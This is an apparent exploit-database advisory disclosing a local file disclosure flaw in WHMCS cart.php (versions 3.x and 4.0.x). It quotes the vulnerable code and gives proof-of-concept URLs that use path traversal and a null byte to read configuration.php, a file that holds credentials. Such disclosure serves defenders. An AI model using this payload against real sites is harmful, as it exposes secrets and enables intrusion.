WHMCompleteSolution suffers from a local file disclosure vulnerability in cart.php.
bfd292d45169e284bde0b8ece7b60d1bb5440aa1f6200db240005f7bda953b72
# Title : WHMCompleteSolution (cart.php) Local File Disclosure
# Author : Lagripe-Dz
# Product : WHMCS ( WHMCompleteSolution )
# Vendor : http://whmcs.com/
# Date : 10/01/2011
# Version : 3.x.x , 4.0.x
# Tested on : linux+apache
================================================================
Vuln file: cart.php
---------
Vuln code:
---------
if ( $a == "add" )
{
$templatefile = "configureproductdomain";
....etc
}
if ( $a == "login" )
{
$templatefile = "login";
....etc
}
...
outputClientArea( $templatefile, $nowrapper );
# outputClientArea function will display
"./templates/orderforms/cart/{$templatefile}.tpl"
Details :
---------
if variable "$a" has a true value .. will set "$templatefile" value by
default
but when "$a" value didn't match the defaults values
you can control "$templatefile" and use it as ( File Disclosure )
Proof of Concept :
------------------
http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]%00
http://domain.tld/[PATH]/cart.php?a=test&templatefile=../../../configuration.php%00
note* : show the page source to see Disclosure file.
Solution :
----------
the vendor Notificate
update to the last version
================================================================
Greetz To All www.Sec4ever.com Members.